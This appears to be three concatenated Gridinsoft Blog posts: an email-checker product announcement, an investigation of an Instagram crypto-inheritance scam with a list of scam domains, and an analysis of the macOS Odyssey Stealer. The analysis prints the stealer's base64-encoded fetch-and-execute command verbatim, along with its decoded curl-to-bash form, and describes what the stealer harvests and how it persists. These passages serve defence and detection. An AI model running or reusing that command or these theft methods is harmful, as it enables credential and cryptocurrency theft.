Today, we are proud to announce a significant leap forward in communication security with the release of the enhanced Gridinsoft Email Security Checker.

Not Just a Check, But a Full Audit

We have moved beyond simple syntax validation to a comprehensive 4-Pillar Security Audit. This new engine is designed to provide deep intelligence on every email you analyze, giving you a definitive verdict on whether a message is safe to engage with.

1. Real-Time Technical Verification

Our engine now performs deep-level MX record analysis and SMTP simulation. We don’t just check if the domain exists; we verify if the mailbox is physically active and ready to receive mail, identifying “ghost” accounts often used in automation.

2. AI-Powered Content Analysis

The heart of the upgrade is our new AI analysis engine. By scanning the message body for subtle phishing patterns, social engineering tactics, and fraudulent link structures, our AI provides a contextual safety score. It doesn’t just look for bad words; it understands the intent of the sender.

3. Global Threat Intelligence

Connected to real-time spam blacklists (DNSBL), the checker cross-references every sender against millions of known malicious records. If a sender has a history of fraud, you’ll know instantly.

4. Infrastructure & Reputation Auditing

Scammers often hide behind “burner” or disposable email addresses. Our enhanced detection identifies these high-risk providers and evaluates domain intelligence (like domain age) to flag suspicious “newborn” domains often used in targeted attacks.

A Visual, Actionable Report

Safety shouldn’t be technical or confusing. Our redesigned report provides:

• Clear Verdicts: Instant color-coded headers (SAFE, SUSPICIOUS, or DANGEROUS).
• Security Scorecard: A transparent breakdown of the four pillars.
• Actionable Advice: Direct recommendations like “Safe to reply” or “Do not click links.”

Global Protection, Total Privacy

Gridinsoft is committed to a safer internet for everyone. That’s why the new Email Checker is:

• Fully Localized: Available in 7 languages (English, Ukrainian, Spanish, Portuguese, German, French, and Chinese).
• Zero-Tracking: We do not store your message content or track your identity. Every check is strictly anonymous and processed over secure SSL/TLS channels.

The post Beyond Validation: Announcing the Gridinsoft Email Security Checker Upgrade appeared first on Gridinsoft Blog.

The scam operates through a network of over 60 fake cryptocurrency platforms, all following the same playbook. After digging through victim reports and analyzing the infrastructure, we uncovered how this operation works – and why people keep falling for it despite the obvious red flags.

Following the Digital Trail: How We Found the Scammers

Our investigation started with a simple Instagram DM that one victim shared: “Me llegó por Instagram un mensaje que me hablaba que me dejaba un dinero porque él iba a morir” (I received an Instagram message telling me they were leaving me money because they were going to die). The message came with login credentials to a site called coinvbs.com.

A Ukrainian user told us what happened next: “I was sitting on Instagram when this message came – ‘I have cancer, I don’t have long left, I loved you, so here’s a gift.’ They gave me a login and password. Against my better judgment, I logged in. The balance showed 4 million USDT. To withdraw? They wanted my crypto wallet address and private key. That’s when I knew it was a scam and backed out.”

But here’s where it gets interesting. This wasn’t just one fake site – it’s an entire network. The same scam, the same fake balances, the same cancer story, but spread across dozens of domains that all look like legitimate crypto exchanges. Think of it as a digital hydra – cut off one head, and two more appear.

The attackers provide login credentials to their fake platforms, where victims see tantalizing balances – often exceeding 7 million USDT. One victim reported accessing miryy[.]com: “I entered the username and password and they were correct. Logging into the account, it’s real that it has an asset of 7,000,000 USDT which I cannot withdraw because it asks for a key that only the account creator has.”

The Domain Game: 60+ Fake Sites and Counting

One frustrated victim decided to do their own detective work and shared what they found: “It’s a whole scam network – mirjz.com, mirwf.com, mirvf.com, and many others all claiming to be USDT storage centers. They constantly demand deposits with different excuses. Try to withdraw? More deposits needed. Try to contact someone? You only get a fake customer service rep who’s in on the scam.”

Through victim reports on Gridinsoft’s Website Reputation Checker, we compiled a list of confirmed scam domains. Ready for this? There are over 60 of them:

Confirmed scam domains:
mirpr[.]com, mirrr[.]vip, miroo[.]vip, mircw[.]com, mirmt[.]com, mirgg[.]vip, mirdd[.]vip, mirgw[.]com, mirdx[.]com, miryy[.]com, mirzq[.]com, mirddw[.]vip, miraa[.]vip, mirss[.]vip, mirpw[.]com, mirqw[.]com, mirzv[.]com, mirzz[.]vip, mirnn[.]vip, mirbb[.]vip, mirnv[.]com, mirsn[.]com, miruu[.]vip, mirmoo[.]vip, mirnj[.]com, mirkp[.]com, mirjz[.]com, mirff[.]vip, mirmr[.]com, mirvx[.]com, mircc[.]vip, mirwr[.]com, mirwf[.]com, mirvf[.]com, coincku[.]com, coinksx[.]com, cointof[.]com, coinehg[.]com, coinyfo[.]com, coinygg[.]com, cointez[.]com, coinseb[.]com, coinwod[.]com, coinvbs[.]com, coinovt[.]com, coinkpr[.]com, dlcex[.]com, localizer[.]ifonetool[.]com, haa[.]cc, ggk[.]cc, ddu[.]cc, beb[.]cc, xok[.]cc, mzm[.]cc, mwx[.]cc, okz[.]cc, kuk[.]cc, ukk[.]cc, msj[.]cc, mwk[.]cc, oyy[.]cc, dsd[.]cc, mfff[.]net

One smart user got suspicious: “I just wanted to check if this mirmr page was real. They gave me an account with way too much money… I wanted to investigate before doing anything.” That caution? It saved them from becoming another victim.

Notice the pattern? All these domains follow a formula: take “mir” and add random letters, or use “coin” with gibberish, or just grab a two-letter .cc domain. It’s like they’re using a domain name generator set to “scam mode.” When one gets reported and blocked, five new ones pop up. It’s whack-a-mole, but with fake crypto exchanges.

The math here is simple: with 60+ domains running the same scam, even a tiny success rate means big money. Each victim who deposits that “verification fee” of $500-5000 adds up. New domains cost pennies, but the returns? We’re talking serious criminal profit.

Why Do People Fall for This? The Psychology is Fascinating

Let’s be honest – getting a random message about inheriting millions should trigger every scam alarm in your brain. But here’s the thing: these scammers are playing a different game. They’re not just after your money; they’re hacking your emotions first. The cancer story? That’s designed to short-circuit your skepticism with sympathy. It’s social engineering 101, but executed brilliantly.

Then comes the masterstroke – they let you log in and see the money. One victim described it perfectly: “When I logged in, it was real – the account had 7,000,000 USDT.” That visual confirmation is powerful. Your brain sees those numbers and starts believing, even when logic says it’s impossible.

Some people get curious and decide to play detective. One user admitted: “I created an account, I’m testing little by little the deposits and withdrawals to confirm if they’re scammers.” That’s exactly what the criminals want – curiosity leading to “small” test deposits that never come back.

It’s the same psychology behind those fake Elon Musk crypto giveaways – show people money they think is theirs, and watch rational thinking evaporate. By the time they ask for that “tiny” $500 verification fee, victims have already mentally spent their millions. Compared to 7 million USDT, what’s $500, right? That’s the trap.

The Real Cost: Following the Money Trail

Here’s where it gets ugly. The “verification fee” starts at $500-5000, but that’s just the appetizer. Once you pay, suddenly there are “taxes,” “transfer fees,” “account upgrades” – the menu of fake charges keeps growing until your wallet is empty or you wise up.

Another person almost fell for it but caught on just in time: “Got a suspicious DM from an account with a woman’s picture. They said they had cancer and wanted to leave me over 1 million USDT. I don’t even know this person. Obviously a scam.”

But here’s the nightmare scenario: some victims hand over their wallet private keys thinking it’s needed for the “transfer.” Game over. That’s not just losing a deposit – that’s giving criminals the keys to your entire crypto holdings. If you want to understand why that’s so dangerous, check out this piece on how crypto wallets actually get hacked.

The worst part? Most victims never report it. Too embarrassed, too ashamed. The scammers count on this silence to keep operating.

The Bigger Picture: It’s Not Just One Scam

Here’s what our investigation uncovered: this isn’t an isolated operation. The same crew running these inheritance scams? They’re probably behind those fake token presales you’ve been seeing. Same playbook, different story.

The technical setup matches what we’ve seen in fake Binance security alerts and other exchange scams. But adding the dying person angle? That’s new. And unfortunately, it works better than you’d think.

How to Spot This Scam (and Not Become Victim #10,001)

Let’s keep it simple. Here are the dead giveaways:

• Random crypto inheritance messages = Scam. Every. Single. Time.
• “I’m dying and want to give you money” = They’re not dying, they want YOUR money
• Pay to withdraw “your” funds = If it’s yours, why are you paying?
• They want your private keys = Never. Not even if they claim to be Satoshi Nakamoto himself
• Domains like mir-whatever[.]com = Check our list above. If it’s there, run.

Before trusting any crypto platform, do your homework. Use tools like Gridinsoft’s Website Reputation Checker to verify if a site is legit. And please, enable 2FA on your Instagram – at least make the scammers work harder.

Got Targeted? Here’s Your Action Plan

If one of these messages lands in your DMs:

1. Don’t reply – Even saying “no thanks” puts you on their “active user” list
2. Screenshot everything – Evidence first, then report and block
3. Report to Instagram – They’re slow, but every report counts
4. Warn your followers – Post about it. These scammers hate exposure
5. Lock down your DMs – Check who can message you in settings

Already sent them money? Act fast:

• Contact your crypto exchange immediately (though honestly, the money’s probably gone)
• File a police report (they need the data even if they can’t help)
• Report to IC3.gov if you’re in the US
• Change ALL your passwords if you downloaded anything they sent
• Check your devices for malware – these guys sometimes double-dip with trojans

What’s Next for This Scam?

Instagram’s playing catch-up. By the time they ban one account sending these messages, ten more are already active. The mir* domain network? It’ll keep growing. We predict they’ll hit 100+ domains by summer 2025.

The scammers are already evolving. We’re seeing variations with “lottery winnings” and “unclaimed family estates” using the same infrastructure. Next, they’ll probably add AI-generated video messages to make the dying person seem real. The playbook stays the same – only the story changes.

Bottom line: As long as people keep falling for “free money from strangers,” these scams will exist. The only real defense? Education and skepticism. If someone you don’t know wants to give you millions, they don’t. It’s that simple.

The post The 7 Million USDT Instagram Scam: How Fake Inheritance Messages Lead to Real Losses appeared first on Gridinsoft Blog.

Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories named lovemrtrump – suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware’s ability to replace legitimate cryptocurrency applications like Ledger Live with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.

The Deception Chain: From Fake Verification to Full Compromise

The attack begins when users are redirected to seemingly legitimate domains like macosx-apps[.]com (macosxappstore[.]com, appmacosx[.]com) displaying convincing Cloudflare-styled verification pages. These pages present users with an “Unusual Web Traffic Detected” warning and request manual verification through terminal commands.

The fake verification page instructs users to:

1. Press Command + Space to open Spotlight
2. Type “Terminal” and press Return
3. Copy and paste a provided command
4. Execute the command to “verify” their legitimacy

What appears to be a simple verification text is actually a base64-encoded malicious command: echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

When decoded, this reveals the true payload: curl -s hxxp[:]//odyssey1[.]to:3333/d?u=october | nohup bash & – a command that downloads and executes an AppleScript stealer from the attacker’s server.

Advanced AppleScript Capabilities: Beyond Basic Info-Stealing

The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like f7220708984353234618 and v4763105019481279311) to evade signature-based detection while systematically harvesting sensitive information.

Targeted Data Collection

The stealer focuses on high-value targets across multiple categories:

• Browser Credentials: Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords
• Cryptocurrency Wallets: Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications
• System Information: Collects detailed hardware and software profiles using system_profiler
• Personal Files: Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key
• Keychain Access: Steals macOS Keychain databases containing stored passwords and certificates
• Apple Notes: Extracts and formats Notes data, potentially revealing personal information and security details

Persistence and Privilege Escalation

The malware establishes multiple persistence mechanisms to maintain long-term access:

• LaunchDaemon Installation: Creates /Library/LaunchDaemons/com.love.russia.plist to ensure automatic execution at boot
• Botnet Binary: Downloads and installs a secondary payload (~/.init) that runs continuously
• Social Engineering for Sudo: Prompts users with fake “Application Helper” dialogs to obtain administrator passwords
• Application Replacement: Can replace legitimate applications like Ledger Live with malicious versions

Technical Analysis: Obfuscation and Anti-Detection

The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical commodity info-stealers like Lumma. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript’s legitimate system access to fly under the radar.

Key Technical Features

Cryptocurrency Focus: The Primary Target

Like many modern stealers, Odyssey specifically targets cryptocurrency assets with precision similar to Meta Infostealer campaigns. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.

High-priority targets include:

• MetaMask: The most common Ethereum wallet extension
• BNB Chain Wallet: Binance Smart Chain access
• Hardware Wallet Interfaces: Ledger Live, Trezor Suite
• Desktop Wallets: Electrum, Exodus, Atomic Wallet
• Exchange Applications: Binance desktop, TonKeeper

The malware’s application replacement capability is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.

The Ledger Live Trojan: Hardware Wallet Compromise

One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:

• Application Termination: Killing any running Ledger Live processes
• File Replacement: Removing the legitimate /Applications/Ledger Live.app
• Malicious Installation: Downloading and installing a trojaned version from hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
• Seamless Operation: The fake application appears identical to users while capturing private keys and transaction data

This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.

Indicators of Compromise (IoCs)

Network Indicators

• C2 Server: odyssey1[.]to:3333
• Download URL: hxxp[:]//odyssey1[.]to:3333/d?u=october
• Fake Domain: macosx-apps[.]com, macosxappstore[.]com, appmacosx[.]com
• Asset Download: hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
• Botnet Binary: hxxp[:]//odyssey1[.]to/otherassets/botnet

File System Artifacts

• Staging Directory: /tmp/lovemrtrump/
• Exfiltration Archive: /tmp/out.zip
• Persistence: /Library/LaunchDaemons/com.love.russia.plist
• User Files: ~/.username, ~/.pwd, ~/.init, ~/.start
• Data Collection: /tmp/lovemrtrump/finder/, /tmp/lovemrtrump/deskwallets/

Detection and Removal Guide

If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.

Immediate Detection Steps

1. Check for Active Processes:

           ps aux | grep -E "(odyssey|lovemrtrump|\.init)"
           launchctl list | grep "com.love.russia"
           

2. Inspect File System:

           ls -la /tmp/lovemrtrump/
           ls -la /Library/LaunchDaemons/com.love.russia.plist
           ls -la ~/.init ~/.start ~/.username ~/.pwd
           

3. Check Network Connections:

           netstat -an | grep "odyssey1"
           lsof -i | grep 3333
           

Manual Removal Process

Warning: Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.

1. Stop Malicious Processes:

           sudo launchctl unload /Library/LaunchDaemons/com.love.russia.plist
           sudo pkill -f "\.init"
           sudo pkill -f "lovemrtrump"
           

2. Remove Persistence Mechanisms:

           sudo rm -f /Library/LaunchDaemons/com.love.russia.plist
           rm -f ~/.init ~/.start ~/.username ~/.pwd
           

3. Clean Temporary Files:

           sudo rm -rf /tmp/lovemrtrump/
           sudo rm -f /tmp/out.zip
           sudo rm -f /tmp/ledger.zip
           sudo rm -f /tmp/starter
           

4. Verify Application Integrity:

           # Check if Ledger Live was replaced
           ls -la "/Applications/Ledger Live.app"
           # Reinstall from official source if suspicious
           

Post-Infection Security Measures

After removing the malware, implement these critical security steps:

Immediate Actions

• Change All Passwords: Update passwords for all accounts, especially financial and cryptocurrency services
• Review Financial Accounts: Check bank statements, credit reports, and cryptocurrency wallet balances
• Enable 2FA: Activate two-factor authentication on all sensitive accounts
• Monitor Credit Reports: Set up fraud alerts with credit bureaus

Browser Security

• Clear Browser Data: Remove all saved passwords, cookies, and form data
• Reinstall Extensions: Remove and reinstall all browser extensions, especially wallet-related ones
• Update Browsers: Ensure all browsers are running the latest versions
• Review Permissions: Audit browser extension permissions and remove unnecessary access

Cryptocurrency Security

• Create New Wallets: Generate new wallet addresses and transfer funds from potentially compromised wallets
• Hardware Wallet Reset: If using hardware wallets, perform a full reset and restore from backup
• Verify Applications: Reinstall all cryptocurrency applications from official sources
• Monitor Transactions: Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity

The Broader Threat Landscape

The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.

This attack shares characteristics with other recent campaigns targeting Mac users, including RustBucket malware and various cross-platform stealers. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users’ trust in system dialogs and terminal commands.

The campaign’s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.

Geopolitical Implications: The Russia Connection

The malware’s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as com.love.russia.plist in the system’s LaunchDaemons directory, while staging stolen data in a folder named lovemrtrump. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.

The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.

Conclusion

The Odyssey Stealer’s distinctive characteristics – from its Russian-themed persistence mechanisms (com.love.russia.plist, lovemrtrump directories) to its specific targeting of hardware wallet applications like Ledger Live – suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.

Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.

As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests.

The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.

The post Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App appeared first on Gridinsoft Blog.